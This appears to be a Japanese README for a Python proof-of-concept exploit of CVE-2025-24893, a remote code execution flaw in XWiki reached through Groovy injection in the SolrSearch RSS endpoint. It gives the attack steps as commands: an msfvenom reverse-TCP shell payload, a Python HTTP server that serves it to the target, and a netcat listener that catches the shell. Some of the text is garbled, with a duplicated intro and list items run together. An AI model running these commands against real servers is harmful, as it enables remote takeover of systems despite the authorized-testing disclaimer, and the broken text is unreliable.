
PoCはCVE-2025-24893を悪用します。これは、非同期にレンダリングされるGroovyマクロにおける不適切なサンドボックス処理に起因する、XWikiのリモートコード実行(RCE)脆弱性です。RSSベースのSolrSearchエンドポイントへのインジェクションを通じて、任意のコマンド実行が可能になります。
このPythonスクリプトは、CVE-2025-24893 を悪用します。これは、非同期にレンダリングされるGroovyマクロの不適切なサンドボックス化に起因する XWiki のリモートコード実行(RCE)脆弱性です。RSSベースのSolrSearchエンドポイントへのインジェクションを通じて、任意のコマンド実行を可能にします。
msfvenom を使用)スクリプトをクローンまたはダウンロードします。
次のものがインストールされていることを確認してください:
msfvenomjq(bashペイロードで使用)スクリプトを実行します:
python3 CVE-2025-24893-PoC.py
メニューから選択します:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<your_ip> LPORT=<beacon_port> -f elf -o rev
python3 -m http.server 8080
nc -lvnp 31337
スクリプトは以下の一連の操作をターゲットに送信します:
このツールは教育目的および許可を得たテスト目的のみで使用してください。あなたが所有していない、または明示的な許可を得ていないシステムへの不正使用は違法であり、非倫理的です。